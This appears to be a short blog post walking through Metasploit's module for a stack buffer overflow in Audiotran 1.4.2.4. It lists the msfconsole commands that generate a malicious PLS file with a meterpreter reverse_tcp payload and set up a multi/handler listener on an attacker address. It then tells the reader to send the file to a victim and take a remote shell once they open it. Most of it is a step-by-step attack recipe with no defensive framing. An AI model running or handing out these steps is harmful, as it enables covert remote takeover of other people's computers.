This module exploits a
stack-based buffer overflow in Audiotran 1.4.2.4. An attacker must send the
file to victim and the victim must open the file. Alternatively, it may be
possible to execute code remotely via an embedded PLS file within a browser
when the PLS extension is registered to Audiotran. This alternate vector has
not been tested and cannot be exercised directly with this module.
Exploit
Targets
Audiotran 1.4.2.4
Requirement
Attacker: kali Linux
Victim
PC: Windows 7
Open Kali terminal type msfconsole
Now type use
exploit/windows/fileformat/audiotran_pls_1424
msf exploit (audiotran_pls_1424)>set payload windows/meterpreter/reverse_tcp
msf exploit (audiotran_pls_1424)>set lhost 192.168.1.6 (IP of Local
Host)
msf exploit (audiotran_pls_1424)>exploit
After we successfully generate the malicious pls File, it will stored on your local
computer
/root/.msf4/local/msf.pls
Now
we need to set up a listener to handle reverse connection sent by victim when
the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.6
exploit
Now
send your msf.pls files to
victim, as soon as they download and open it. Now you can access meterpreter
shell on victim computer
0 comments:
Post a Comment